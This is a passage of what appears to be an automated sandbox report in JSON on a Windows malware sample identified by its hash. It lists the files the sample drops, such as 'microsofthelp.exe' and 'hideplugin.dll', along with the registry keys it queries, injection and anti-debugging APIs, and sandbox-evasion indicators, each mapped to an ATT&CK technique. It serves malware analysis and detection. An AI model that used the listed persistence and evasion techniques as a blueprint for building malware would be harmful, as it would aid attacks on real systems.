"\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" writes file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" writes file \"c:\\windows\\hideplugin.dll\"\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" writes file \"%windir%\\microsofthelp.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A480BA.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005932]\n \"MICROSOFTHELP.EXE.67A47CFC.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"7B5A05478B59B5382B30F75364E994877C1DB6FD88625EB95EBF0EE54E5682B9\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Possibly tries to evade analysis by sleeping many times", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"OutputDebugStringW\" (Indicator: \"OutputDebugString\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"OutputDebugStringA\" (Indicator: \"OutputDebugString\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001432)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemDefaultUILanguage\" (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetUserDefaultUILanguage\" (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"DISMHOST.EXE.67A480BA.bin\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"IsWow64Process\" with parameter \"5932\" - (UID: 00000000-00005932)\n \"microsofthelp.exe\" called \"IsWow64Process\" with parameter \"5968\" - (UID: 00000000-00005968)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000290028dc290023dc290000000000000000000000270000000001ecd912000000000050e7120095e17f77e6510700feffffff435c837750598377aa000000b800000022dc290020dc290074db1200acdf1200000000000000000000000000000000000000000000000000c00c0000000027001c5c827760d88475ffffffff1700000024db1200240000000300000014e0120040e51200acdf12008600000050db120096ed83774adc2900a06a59758600000074db1200acdf12000000000086008800a06a597574db1200916c59754adc2900a06a5975a06a5975e4df120002020000 (UID: 00000000-00005932)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b4ef1200000000003800000004f01200feffffff8cef1200cf008477d6008477d5a99677380000001c00000004f012000000000060ef120000000000c8ef1200 (UID: 00000000-00005968)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": 